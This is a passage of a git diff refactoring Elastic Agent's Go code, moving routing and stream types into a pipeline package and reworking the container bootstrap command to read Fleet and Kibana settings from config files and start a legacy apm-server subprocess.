r, err := New(nil, recorder.factory) require.NoError(t, err) - r.Dispatch("hello", map[routingKey][]program.Program{ - defautlRK: programs, - k1: programs, - k2: programs, + r.Route("hello", map[pipeline.RoutingKey][]program.Program{ + pipeline.DefaultRK: programs, + k1: programs, + k2: programs, }) assertOps(t, []event{ - e(defautlRK, createOp), - e(defautlRK, executeOp), - e(k1, createOp), e(k1, executeOp), e(k2, createOp), e(k2, executeOp), + + e(pipeline.DefaultRK, createOp), + e(pipeline.DefaultRK, executeOp), }, recorder.events) recorder.reset() nk := "SECOND_DISPATCH" - r.Dispatch("hello-2", map[routingKey][]program.Program{ + r.Route("hello-2", map[pipeline.RoutingKey][]program.Program{ nk: programs, }) @@ -107,33 +108,33 @@ func TestRouter(t *testing.T) { e(nk, createOp), e(nk, executeOp), - e(defautlRK, closeOp), e(k1, closeOp), e(k2, closeOp), + e(pipeline.DefaultRK, closeOp), }, recorder.events) }) t.Run("create new and delegate program to existing stream", func(t *testing.T) { recorder := &recorder{} - r, err := newRouter(nil, recorder.factory) + r, err := New(nil, recorder.factory) require.NoError(t, err) - r.Dispatch("hello", map[routingKey][]program.Program{ - defautlRK: programs, + r.Route("hello", map[pipeline.RoutingKey][]program.Program{ + pipeline.DefaultRK: programs, }) assertOps(t, []event{ - e(defautlRK, createOp), - e(defautlRK, executeOp), + e(pipeline.DefaultRK, createOp), + e(pipeline.DefaultRK, executeOp), }, recorder.events) recorder.reset() - r.Dispatch("hello-2", map[routingKey][]program.Program{ - defautlRK: programs, + r.Route("hello-2", map[pipeline.RoutingKey][]program.Program{ + pipeline.DefaultRK: programs, }) assertOps(t, []event{ - e(defautlRK, executeOp), + e(pipeline.DefaultRK, executeOp), }, recorder.events) }) @@ -142,31 +143,31 @@ func TestRouter(t *testing.T) { k2 := "KEY_2" recorder := &recorder{} - r, err := newRouter(nil, recorder.factory) + r, err := New(nil, recorder.factory) require.NoError(t, err) - r.Dispatch("hello", map[routingKey][]program.Program{ - defautlRK: programs, - k1: programs, - k2: programs, + r.Route("hello", map[pipeline.RoutingKey][]program.Program{ + pipeline.DefaultRK: programs, + k1: programs, + k2: programs, }) assertOps(t, []event{ - e(defautlRK, createOp), - e(defautlRK, executeOp), e(k1, createOp), e(k1, executeOp), e(k2, createOp), e(k2, executeOp), + e(pipeline.DefaultRK, createOp), + e(pipeline.DefaultRK, executeOp), }, recorder.events) recorder.reset() - r.Dispatch("hello-2", map[routingKey][]program.Program{}) + r.Route("hello-2", map[pipeline.RoutingKey][]program.Program{}) assertOps(t, []event{ - e(defautlRK, closeOp), e(k1, closeOp), e(k2, closeOp), + e(pipeline.DefaultRK, closeOp), }, recorder.events) }) } @@ -175,11 +176,11 @@ type recorder struct { events []event } -func (r *recorder) factory(_ *logger.Logger, rk routingKey) (stream, error) { +func (r *recorder) factory(_ *logger.Logger, rk pipeline.RoutingKey) (pipeline.Stream, error) { return newMockStream(rk, r.notify), nil } -func (r *recorder) notify(rk routingKey, op rOp, args ...interface{}) { +func (r *recorder) notify(rk pipeline.RoutingKey, op rOp, args ...interface{}) { r.events = append(r.events, e(rk, op)) } @@ -188,11 +189,11 @@ func (r *recorder) reset() { } type mockStream struct { - rk routingKey + rk pipeline.RoutingKey notify notifyFunc } -func newMockStream(rk routingKey, notify notifyFunc) *mockStream { +func newMockStream(rk pipeline.RoutingKey, notify notifyFunc) *mockStream { notify(rk, createOp) return &mockStream{ rk: rk, @@ -221,6 +222,6 @@ func assertOps(t *testing.T, expected []event, received []event) { require.Equal(t, expected, received) } -func e(rk routingKey, op rOp) event { +func e(rk pipeline.RoutingKey, op rOp) event { return event{rk: rk, op: op} } diff --git a/x-pack/elastic-agent/pkg/agent/application/stream.go b/x-pack/elastic-agent/pkg/agent/application/pipeline/stream/factory.go similarity index 71% rename from x-pack/elastic-agent/pkg/agent/application/stream.go rename to x-pack/elastic-agent/pkg/agent/application/pipeline/stream/factory.go index 4bdb21f32ed..70258ed1794 100644 --- a/x-pack/elastic-agent/pkg/agent/application/stream.go +++ b/x-pack/elastic-agent/pkg/agent/application/pipeline/stream/factory.go @@ -2,13 +2,13 @@ // or more contributor license agreements. Licensed under the Elastic License; // you may not use this file except in compliance with the Elastic License. -package application +package stream import ( "context" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/info" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/configrequest" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/configuration" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/operation" @@ -24,26 +24,9 @@ import ( "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/release" ) -type operatorStream struct { - configHandler ConfigHandler - log *logger.Logger - monitor monitoring.Monitor -} - -func (b *operatorStream) Close() error { - return b.configHandler.Close() -} - -func (b *operatorStream) Execute(cfg configrequest.Request) error { - return b.configHandler.HandleConfig(cfg) -} - -func (b *operatorStream) Shutdown() { - b.configHandler.Shutdown() -} - -func streamFactory(ctx context.Context, agentInfo *info.AgentInfo, cfg *configuration.SettingsConfig, srv *server.Server, r state.Reporter, m monitoring.Monitor, statusController status.Controller) func(*logger.Logger, routingKey) (stream, error) { - return func(log *logger.Logger, id routingKey) (stream, error) { +// Factory creates a new stream factory. +func Factory(ctx context.Context, agentInfo *info.AgentInfo, cfg *configuration.SettingsConfig, srv *server.Server, r state.Reporter, m monitoring.Monitor, statusController status.Controller) func(*logger.Logger, pipeline.RoutingKey) (pipeline.Stream, error) { + return func(log *logger.Logger, id pipeline.RoutingKey) (pipeline.Stream, error) { // new operator per stream to isolate processes without using tags operator, err := newOperator(ctx, log, agentInfo, id, cfg, srv, r, m, statusController) if err != nil { @@ -57,7 +40,7 @@ func streamFactory(ctx context.Context, agentInfo *info.AgentInfo, cfg *configur } } -func newOperator(ctx context.Context, log *logger.Logger, agentInfo *info.AgentInfo, id routingKey, config *configuration.SettingsConfig, srv *server.Server, r state.Reporter, m monitoring.Monitor, statusController status.Controller) (*operation.Operator, error) { +func newOperator(ctx context.Context, log *logger.Logger, agentInfo *info.AgentInfo, id pipeline.RoutingKey, config *configuration.SettingsConfig, srv *server.Server, r state.Reporter, m monitoring.Monitor, statusController status.Controller) (*operation.Operator, error) { fetcher := downloader.NewDownloader(log, config.DownloadConfig) allowEmptyPgp, pgp := release.PGP() verifier, err := downloader.NewVerifier(log, config.DownloadConfig, allowEmptyPgp, pgp) diff --git a/x-pack/elastic-agent/pkg/agent/application/pipeline/stream/operator_stream.go b/x-pack/elastic-agent/pkg/agent/application/pipeline/stream/operator_stream.go new file mode 100644 index 00000000000..519a7b6bb52 --- /dev/null +++ b/x-pack/elastic-agent/pkg/agent/application/pipeline/stream/operator_stream.go @@ -0,0 +1,28 @@ +// Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one +// or more contributor license agreements. Licensed under the Elastic License; +// you may not use this file except in compliance with the Elastic License. + +package stream + +import ( + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/pipeline" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/configrequest" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" +) + +type operatorStream struct { + configHandler pipeline.ConfigHandler + log *logger.Logger +} + +func (b *operatorStream) Close() error { + return b.configHandler.Close() +} + +func (b *operatorStream) Execute(cfg configrequest.Request) error { + return b.configHandler.HandleConfig(cfg) +} + +func (b *operatorStream) Shutdown() { + b.configHandler.Shutdown() +} diff --git a/x-pack/elastic-agent/pkg/agent/application/upgrade/crash_checker_test.go b/x-pack/elastic-agent/pkg/agent/application/upgrade/crash_checker_test.go index b297431456e..811c75bf3b0 100644 --- a/x-pack/elastic-agent/pkg/agent/application/upgrade/crash_checker_test.go +++ b/x-pack/elastic-agent/pkg/agent/application/upgrade/crash_checker_test.go @@ -129,7 +129,7 @@ func TestChecker(t *testing.T) { func testableChecker(t *testing.T, pider *testPider) (*CrashChecker, chan error) { errChan := make(chan error, 1) - l, _ := logger.New("") + l, _ := logger.New("", false) ch, err := NewCrashChecker(context.Background(), errChan, l) require.NoError(t, err) diff --git a/x-pack/elastic-agent/pkg/agent/cmd/common.go b/x-pack/elastic-agent/pkg/agent/cmd/common.go index 60f01cadf15..753bf61e6be 100644 --- a/x-pack/elastic-agent/pkg/agent/cmd/common.go +++ b/x-pack/elastic-agent/pkg/agent/cmd/common.go @@ -7,37 +7,16 @@ package cmd import ( "flag" "os" - "path/filepath" "github.com/spf13/cobra" // import logp flags _ "github.com/elastic/beats/v7/libbeat/logp/configure" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/paths" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/basecmd" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/cli" ) -const ( - defaultConfig = "elastic-agent.yml" - hashLen = 6 - commitFile = ".elastic-agent.active.commit" - agentLockFileName = "agent.lock" -) - -type globalFlags struct { - PathConfigFile string -} - -// Config returns path which identifies configuration file. -func (f *globalFlags) Config() string { - if len(f.PathConfigFile) == 0 || f.PathConfigFile == defaultConfig { - return filepath.Join(paths.Config(), defaultConfig) - } - return f.PathConfigFile -} - // NewCommand returns the default command for the agent. func NewCommand() *cobra.Command { return NewCommandWithArgs(os.Args, cli.NewIOStreams()) @@ -49,13 +28,13 @@ func NewCommandWithArgs(args []string, streams *cli.IOStreams) *cobra.Command { Use: "elastic-agent [subcommand]", } - flags := &globalFlags{} - // path flags cmd.PersistentFlags().AddGoFlag(flag.CommandLine.Lookup("path.home")) + cmd.PersistentFlags().AddGoFlag(flag.CommandLine.Lookup("path.home.unversioned")) + cmd.PersistentFlags().MarkHidden("path.home.unversioned") // hidden used internally by container subcommand cmd.PersistentFlags().AddGoFlag(flag.CommandLine.Lookup("path.config")) + cmd.PersistentFlags().AddGoFlag(flag.CommandLine.Lookup("c")) cmd.PersistentFlags().AddGoFlag(flag.CommandLine.Lookup("path.logs")) - cmd.PersistentFlags().StringVarP(&flags.PathConfigFile, "c", "c", defaultConfig, `Configuration file, relative to path.config`) // logging flags cmd.PersistentFlags().AddGoFlag(flag.CommandLine.Lookup("v")) @@ -64,19 +43,20 @@ func NewCommandWithArgs(args []string, streams *cli.IOStreams) *cobra.Command { cmd.PersistentFlags().AddGoFlag(flag.CommandLine.Lookup("environment")) // sub-commands - run := newRunCommandWithArgs(flags, args, streams) + run := newRunCommandWithArgs(args, streams) cmd.AddCommand(basecmd.NewDefaultCommandsWithArgs(args, streams)...) cmd.AddCommand(run) - cmd.AddCommand(newInstallCommandWithArgs(flags, args, streams)) - cmd.AddCommand(newUninstallCommandWithArgs(flags, args, streams)) - cmd.AddCommand(newUpgradeCommandWithArgs(flags, args, streams)) - cmd.AddCommand(newEnrollCommandWithArgs(flags, args, streams)) - cmd.AddCommand(newInspectCommandWithArgs(flags, args, streams)) - cmd.AddCommand(newWatchCommandWithArgs(flags, args, streams)) - cmd.AddCommand(newContainerCommand(flags, args, streams)) + cmd.AddCommand(newInstallCommandWithArgs(args, streams)) + cmd.AddCommand(newUninstallCommandWithArgs(args, streams)) + cmd.AddCommand(newUpgradeCommandWithArgs(args, streams)) + cmd.AddCommand(newEnrollCommandWithArgs(args, streams)) + cmd.AddCommand(newInspectCommandWithArgs(args, streams)) + cmd.AddCommand(newWatchCommandWithArgs(args, streams)) + cmd.AddCommand(newContainerCommand(args, streams)) + cmd.AddCommand(newStatusCommand(args, streams)) // windows special hidden sub-command (only added on windows) - reexec := newReExecWindowsCommand(flags, args, streams) + reexec := newReExecWindowsCommand(args, streams) if reexec != nil { cmd.AddCommand(reexec) } diff --git a/x-pack/elastic-agent/pkg/agent/cmd/container.go b/x-pack/elastic-agent/pkg/agent/cmd/container.go index fdbbaa213a4..b1902010ae3 100644 --- a/x-pack/elastic-agent/pkg/agent/cmd/container.go +++ b/x-pack/elastic-agent/pkg/agent/cmd/container.go @@ -6,35 +6,43 @@ package cmd import ( "bytes" + "context" "encoding/json" "fmt" "io" + "io/ioutil" "net/url" "os" "os/exec" + "path/filepath" "regexp" "strings" + "sync" + "syscall" "time" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/configuration" + "github.com/spf13/cobra" "github.com/elastic/beats/v7/libbeat/common/transport/tlscommon" "github.com/elastic/beats/v7/libbeat/kibana" - "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/application/paths" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/errors" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/agent/program" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/artifact" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/artifact/install/tar" "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/cli" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/config" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/logger" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/core/process" + "github.com/elastic/beats/v7/x-pack/elastic-agent/pkg/release" ) const ( - defaultKibanaHost = "http://kibana:5601" - defaultESHost = "http://elasticsearch:9200" - defaultUsername = "elastic" - defaultPassword = "changeme" - defaultTokenName = "Default" - - requestRetrySleep = 1 * time.Second // sleep 1 sec between retries for HTTP requests - maxRequestRetries = 30 // maximum number of retries for HTTP requests + requestRetrySleep = 1 * time.Second // sleep 1 sec between retries for HTTP requests + maxRequestRetries = 30 // maximum number of retries for HTTP requests + defaultStateDirectory = "/usr/share/elastic-agent/state" // directory that will hold the state data ) var ( @@ -43,8 +51,8 @@ var ( tokenNameStrip = regexp.MustCompile(`\s\([0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}\)$`) ) -func newContainerCommand(flags *globalFlags, _ []string, streams *cli.IOStreams) *cobra.Command { - return &cobra.Command{ +func newContainerCommand(_ []string, streams *cli.IOStreams) *cobra.Command { + cmd := cobra.Command{ Hidden: true, // not exposed over help; used by container entrypoint only Use: "container", Short: "Bootstrap Elastic Agent to run inside of a container", @@ -112,15 +120,98 @@ all the above actions will be skipped, because the Elastic Agent has already bee occurs on every start of the container set FLEET_FORCE to 1. `, Run: func(c *cobra.Command, args []string) { - if err := containerCmd(streams, c, flags, args); err != nil { - fmt.Fprintf(streams.Err, "Error: %v\n", err) + if err := containerCmd(streams, c); err != nil { + logError(streams, err) os.Exit(1) } }, } + return &cmd +} + +func logError(streams *cli.IOStreams, err error) { + fmt.Fprintf(streams.Err, "Error: %v\n", err) } -func containerCmd(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags, args []string) error { +func logInfo(streams *cli.IOStreams, msg string) { + fmt.Fprintln(streams.Out, msg) +} + +func containerCmd(streams *cli.IOStreams, cmd *cobra.Command) error { + // set paths early so all action below use the defined paths + if err := setPaths(); err != nil { + return err + } + + // create access configuration from ENV and config files + cfg := defaultAccessConfig() + for _, f := range []string{"fleet-setup.yml", "credentials.yml"} { + c, err := config.LoadFile(filepath.Join(paths.Config(), f)) + if err != nil && !os.IsNotExist(err) { + return fmt.Errorf("parsing config file(%s): %s", f, err) + } + if c != nil { + err = c.Unpack(&cfg) + if err != nil { + return fmt.Errorf("unpacking config file(%s): %s", f, err) + } + } + } + + // start apm-server legacy process when in cloud mode + var wg sync.WaitGroup + var apmProc *process.Info + _, elasticCloud := os.LookupEnv("ELASTIC_AGENT_CLOUD") + apmPath := os.Getenv("APM_SERVER_PATH") + if elasticCloud { + logInfo(streams, "Starting in elastic cloud mode") + if elasticCloud && apmPath != "" { + // run legacy APM Server as a daemon; send termination signal + // to the main process if the daemon is stopped + mainProc, err := os.FindProcess(os.Getpid()) + if err != nil { + return errors.New(err, "finding current process") + } + if apmProc, err = runLegacyAPMServer(streams, apmPath); err != nil { + return errors.New(err, "starting legacy apm-server") + } + wg.Add(1) // apm-server legacy process + logInfo(streams, "Legacy apm-server daemon started.") + go func() { + if err := func() error { + apmProcState, err := apmProc.Process.Wait() + if err != nil { + return err + } + if apmProcState.ExitCode() != 0 { + return fmt.Errorf("apm-server process exited with %d", apmProcState.ExitCode()) + } + return nil + }(); err != nil { + logError(streams, err) + } + + wg.Done() + // sending kill signal to current process (elastic-agent) + logInfo(streams, "Initiate shutdown elastic-agent.") + mainProc.Signal(syscall.SIGTERM) + }() + + defer func() { + if apmProc != nil { + apmProc.Stop() + logInfo(streams, "Initiate shutdown legacy apm-server.") + } + wg.Wait() + }() + } + } + + // run the main elastic-agent container command + return runContainerCmd(streams, cmd, cfg) +} + +func runContainerCmd(streams *cli.IOStreams, cmd *cobra.Command, cfg setupConfig) error { var err error var client *kibana.Client executable, err := os.Executable() @@ -129,40 +220,37 @@ func containerCmd(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags } _, err = os.Stat(paths.AgentConfigFile()) - if !os.IsNotExist(err) && !envBool("FLEET_FORCE") { + if !os.IsNotExist(err) && !cfg.Fleet.Force { // already enrolled, just run the standard run - return run(flags, streams) + return run(streams, logToStderr) } - // Remove FLEET_SETUP in 8.x - // The FLEET_SETUP environment variable boolean is a fallback to the old name. The name was updated to - // reflect that its setting up Fleet in Kibana versus setting up Fleet Server. - if envBool("KIBANA_FLEET_SETUP", "FLEET_SETUP") { - client, err = kibanaClient() + if cfg.Kibana.Fleet.Setup { + client, err = kibanaClient(cfg.Kibana) if err != nil { return err } - fmt.Fprintf(streams.Out, "Performing setup of Fleet in Kibana\n") + logInfo(streams, "Performing setup of Fleet in Kibana\n") err = kibanaSetup(client, streams) if err != nil { return err } } - if envBool("FLEET_ENROLL", "FLEET_SERVER_ENABLE") { + if cfg.Fleet.Enroll { if client == nil { - client, err = kibanaClient() + client, err = kibanaClient(cfg.Kibana) if err != nil { return err } } var policy *kibanaPolicy - token := envWithDefault("", "FLEET_ENROLLMENT_TOKEN") + token := cfg.Fleet.EnrollmentToken if token == "" { - policy, err = kibanaFetchPolicy(client, streams) + policy, err = kibanaFetchPolicy(client, cfg, streams) if err != nil { return err } - token, err = kibanaFetchToken(client, policy, streams) + token, err = kibanaFetchToken(client, policy, streams, cfg.Fleet.TokenName) if err != nil { return err } @@ -171,7 +259,7 @@ func containerCmd(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags if policy != nil { policyID = policy.ID } - cmdArgs, err := buildEnrollArgs(token, policyID) + cmdArgs, err := buildEnrollArgs(cfg, token, policyID) if err != nil { return err } @@ -188,70 +276,68 @@ func containerCmd(streams *cli.IOStreams, cmd *cobra.Command, flags *globalFlags } } - return run(flags, streams) + return run(streams, logToStderr) } -func buildEnrollArgs(token string, policyID string) ([]string, error) { - args := []string{"enroll", "-f"} - if envBool("FLEET_SERVER_ENABLE") { - connStr, err := buildFleetServerConnStr() +func buildEnrollArgs(cfg setupConfig, token string, policyID string) ([]string, error) { + args := []string{ + "enroll", "-f", + "-c", paths.ConfigFile(), + "--path.home", paths.Top(), // --path.home actually maps to paths.Top() + "--path.config", paths.Config(), + "--path.logs", paths.Logs(), + } + if !paths.IsVersionHome() { + args = append(args, "--path.home.unversioned") + } + if cfg.FleetServer.Enable { + connStr, err := buildFleetServerConnStr(cfg.FleetServer) if err != nil { return nil, err } args = append(args, "--fleet-server", connStr) if policyID == "" { - policyID = envWithDefault("", "FLEET_SERVER_POLICY_ID") + policyID = cfg.FleetServer.PolicyID } if policyID != "" { args = append(args, "--fleet-server-policy", policyID) } - ca := envWithDefault("", "FLEET_SERVER_ELASTICSEARCH_CA", "ELASTICSEARCH_CA") - if ca != "" { - args = append(args, "--fleet-server-elasticsearch-ca", ca) + if cfg.FleetServer.Elasticsearch.CA != "" { + args = append(args, "--fleet-server-elasticsearch-ca", cfg.FleetServer.Elasticsearch.CA) } - host := envWithDefault("", "FLEET_SERVER_HOST") - if host != "" { - args = append(args, "--fleet-server-host", host) + if cfg.FleetServer.Host != "" { + args = append(args, "--fleet-server-host", cfg.FleetServer.Host) } - port := envWithDefault("", "FLEET_SERVER_PORT") - if port != "" { - args = append(args, "--fleet-server-port", port) + if cfg.FleetServer.Port != "" { + args = append(args, "--fleet-server-port", cfg.FleetServer.Port) } - cert := envWithDefault("", "FLEET_SERVER_CERT") - if cert != "" { - args = append(args, "--fleet-server-cert", cert) + if cfg.FleetServer.Cert != "" { + args = append(args, "--fleet-server-cert", cfg.FleetServer.Cert) } - certKey := envWithDefault("", "FLEET_SERVER_CERT_KEY") - if certKey != "" { - args = append(args, "--fleet-server-cert-key", certKey) + if cfg.FleetServer.CertKey != "" { + args = append(args, "--fleet-server-cert-key", cfg.FleetServer.CertKey) } - if envBool("FLEET_SERVER_INSECURE_HTTP") { + if cfg.FleetServer.InsecureHTTP { args = append(args, "--fleet-server-insecure-http") args = append(args, "--insecure") } } else { - url := envWithDefault("", "FLEET_URL") - if url == "" { + if cfg.Fleet.URL == "" { return nil, errors.New("FLEET_URL is required when FLEET_ENROLL is true without FLEET_SERVER_ENABLE") } - args = append(args, "--url", url) - if envBool("FLEET_INSECURE") { + args = append(args, "--url", cfg.Fleet.URL) + if cfg.Fleet.Insecure { args = append(args, "--insecure") } - ca := envWithDefault("", "FLEET_CA", "KIBANA_CA", "ELASTICSEARCH_CA") - if ca != "" { - args = append(args, "--certificate-authorities", ca) + if cfg.Fleet.CA != "" { + args = append(args, "--certificate-authorities", cfg.Fleet.CA) } } - args = append(args, "--enrollment-token", token) - return args, nil + return append(args, "--enrollment-token", token), nil } -func buildFleetServerConnStr() (string, error) { - host := envWithDefault(defaultESHost, "FLEET_SERVER_ELASTICSEARCH_HOST", "ELASTICSEARCH_HOST") - username := envWithDefault(defaultUsername, "FLEET_SERVER_ELASTICSEARCH_USERNAME", "ELASTICSEARCH_USERNAME") - password := envWithDefault(defaultPassword, "FLEET_SERVER_ELASTICSEARCH_PASSWORD", "ELASTICSEARCH_PASSWORD") - u, err := url.Parse(host) +func buildFleetServerConnStr(cfg fleetServerConfig) (string, error) { + u, err := url.Parse(cfg.Elasticsearch.Host) if err != nil { return "", err } @@ -259,7 +345,7 @@ func buildFleetServerConnStr() (string, error) { if u.Path != "" { path += "/" + strings.TrimLeft(u.Path, "/") } - return fmt.Sprintf("%s://%s:%s@%s%s", u.Scheme, username, password, u.Host, path), nil + return fmt.Sprintf("%s://%s:%s@%s%s", u.Scheme, cfg.Elasticsearch.Username, cfg.Elasticsearch.Password, u.Host, path), nil } func kibanaSetup(client *kibana.Client, streams *cli.IOStreams) error { @@ -274,22 +360,22 @@ func kibanaSetup(client *kibana.Client, streams *cli.IOStreams) error { return nil } -func kibanaFetchPolicy(client *kibana.Client, streams *cli.IOStreams) (*kibanaPolicy, error) { +func kibanaFetchPolicy(client *kibana.Client, cfg setupConfig, streams *cli.IOStreams) (*kibanaPolicy, error) { var policies kibanaPolicies err := performGET(client, "/api/fleet/agent_policies", &policies, streams.Err, "Kibana fetch policy") if err != nil { return nil, err } - return findPolicy(policies.Items) + return findPolicy(cfg, policies.Items) } -func kibanaFetchToken(client *kibana.Client, policy *kibanaPolicy, streams *cli.IOStreams) (string, error) { +func kibanaFetchToken(client *kibana.Client, policy *kibanaPolicy, streams *cli.IOStreams, tokenName string) (string, error) { var keys kibanaAPIKeys err := performGET(client, "/api/fleet/enrollment-api-keys", &keys, streams.Err, "Kibana fetch token") if err != nil { return "", err } - key, err := findKey(keys.List, policy) + key, err := findKey(keys.List, policy, tokenName) if err != nil { return "", err } @@ -301,32 +387,26 @@ func kibanaFetchToken(client *kibana.Client, policy *kibanaPolicy, streams *cli. return keyDetail.Item.APIKey, nil } -func kibanaClient() (*kibana.Client, error) { - host := envWithDefault(defaultKibanaHost, "KIBANA_FLEET_HOST", "KIBANA_HOST") - username := envWithDefault(defaultUsername, "KIBANA_FLEET_USERNAME", "KIBANA_USERNAME", "ELASTICSEARCH_USERNAME") - password := envWithDefault(defaultPassword, "KIBANA_FLEET_PASSWORD", "KIBANA_PASSWORD", "ELASTICSEARCH_PASSWORD") - +func kibanaClient(cfg kibanaConfig) (*kibana.Client, error) { var tls *tlscommon.Config - ca := envWithDefault("", "KIBANA_FLEET_CA", "KIBANA_CA", "ELASTICSEARCH_CA") - if ca != "" { + if cfg.Fleet.CA != "" { tls = &tlscommon.Config{ - CAs: []string{ca}, + CAs: []string{cfg.Fleet.CA}, } } return kibana.NewClientWithConfig(&kibana.ClientConfig{ - Host: host, - Username: username, - Password: password, + Host: cfg.Fleet.Host, + Username: cfg.Fleet.Username, + Password: cfg.Fleet.Password, IgnoreVersion: true, TLS: tls, }) } -func findPolicy(policies []kibanaPolicy) (*kibanaPolicy, error) { - fleetServerEnabled := envBool("FLEET_SERVER_ENABLE") - policyName := envWithDefault("", "FLEET_TOKEN_POLICY_NAME") - if fleetServerEnabled { - policyName = envWithDefault("", "FLEET_SERVER_POLICY_NAME", "FLEET_TOKEN_POLICY_NAME") +func findPolicy(cfg setupConfig, policies []kibanaPolicy) (*kibanaPolicy, error) { + policyName := cfg.Fleet.TokenPolicyName + if cfg.FleetServer.Enable { + policyName = cfg.FleetServer.PolicyName } for _, policy := range policies { if policy.Status != "active" { @@ -336,7 +416,7 @@ func findPolicy(policies []kibanaPolicy) (*kibanaPolicy, error) { if policyName == policy.Name { return &policy, nil } - } else if fleetServerEnabled { + } else if cfg.FleetServer.Enable { if policy.IsDefaultFleetServer { return &policy, nil } @@ -349,8 +429,7 @@ func findPolicy(policies []kibanaPolicy) (*kibanaPolicy, error) { return nil, fmt.Errorf(`unable to find policy named "%s"`, policyName) } -func findKey(keys []kibanaAPIKey, policy *kibanaPolicy) (*kibanaAPIKey, error) { - tokenName := envWithDefault(defaultTokenName, "FLEET_TOKEN_NAME") +func findKey(keys []kibanaAPIKey, policy *kibanaPolicy, tokenName string) (*kibanaAPIKey, error) { for _, key := range keys { name := strings.TrimSpace(tokenNameStrip.ReplaceAllString(key.Name, "")) if name == tokenName && key.PolicyID == policy.ID { @@ -437,6 +516,157 @@ func truncateString(b []byte) string { return strings.Replace(string(runes), "\n", " ", -1) } +// runLegacyAPMServer extracts the bundled apm-server from elastic-agent +// to path and runs it with args. +func runLegacyAPMServer(streams *cli.IOStreams, path string) (*process.Info, error) { + name := "apm-server" + logInfo(streams, "Preparing apm-server for legacy mode.") + cfg := artifact.DefaultConfig() + + logInfo(streams, fmt.Sprintf("Extracting apm-server into install directory %s.", path)) + installer, err := tar.NewInstaller(cfg) + if err != nil { + return nil, errors.New(err, "creating installer") + } + spec := program.Spec{Name: name, Cmd: name, Artifact: name} + version := release.Version() + if release.Snapshot() { + version = fmt.Sprintf("%s-SNAPSHOT", version) + } + // Extract the bundled apm-server into the APM_SERVER_PATH + if err := installer.Install(context.Background(), spec, version, path); err != nil { + return nil, errors.New(err, + fmt.Sprintf("installing %s (%s) from %s to %s", spec.Name, version, cfg.TargetDirectory, path)) + } + // Get the apm-server directory + files, err := ioutil.ReadDir(path) + if err != nil { + return nil, errors.New(err, fmt.Sprintf("reading directory %s", path)) + } + if len(files) != 1 || !files[0].IsDir() { + return nil, errors.New("expected one directory") + } + apmDir := filepath.Join(path, files[0].Name()) + // Extract the ingest pipeline definition to the HOME_DIR + if home := os.Getenv("HOME_PATH"); home != "" { + if err := syncDir(filepath.Join(apmDir, "ingest"), filepath.Join(home, "ingest")); err != nil { + return nil, fmt.Errorf("syncing APM ingest directory to HOME_PATH(%s) failed: %s", home, err) + } + } + // Start apm-server process respecting path ENVs + apmBinary := filepath.Join(apmDir, spec.Cmd) + log, err := logger.New("apm-server", false) + if err != nil { + return nil, err + } + // add APM Server specific configuration + var args []string + addEnv := func(arg, env string) { + if v := os.Getenv(env); v != "" { + args = append(args, arg, v) + } + } + addEnv("--path.home", "HOME_PATH") + addEnv("--path.config", "CONFIG_PATH") + addEnv("--path.data", "DATA_PATH") + addEnv("--path.logs", "LOGS_PATH") + addEnv("--httpprof", "HTTPPROF") + logInfo(streams, "Starting legacy apm-server daemon as a subprocess.") + return process.Start(log, apmBinary, nil, os.Geteuid(), os.Getegid(), args...) +} + +func logToStderr(cfg *configuration.Configuration) { + logsPath := envWithDefault("", "LOGS_PATH") + if logsPath == "" { + // when no LOGS_PATH defined the container should log to stderr + cfg.Settings.LoggingConfig.ToStderr = true + cfg.Settings.LoggingConfig.ToFiles = false + } +} + +func setPaths() error { + statePath := envWithDefault(defaultStateDirectory, "STATE_PATH") + if statePath == "" { + return errors.New("STATE_PATH cannot be set to an empty string") + } + topPath := filepath.Join(statePath, "data") + configPath := envWithDefault("", "CONFIG_PATH") + if configPath == "" { + configPath = statePath + } + // ensure that the directory and sub-directory data exists + if err := os.MkdirAll(topPath, 0755); err != nil { + return fmt.Errorf("preparing STATE_PATH(%s) failed: %s", statePath, err) + } + // ensure that the elastic-agent.yml exists in the state directory or if given in the config directory + baseConfig := filepath.Join(configPath, paths.DefaultConfigName) + if _, err := os.Stat(baseConfig); os.IsNotExist(err) { + if err := copyFile(baseConfig, paths.ConfigFile(), 0); err != nil { + return err + } + } + // sync the downloads to the data directory + srcDownloads := filepath.Join(paths.Home(), "downloads") + destDownloads := 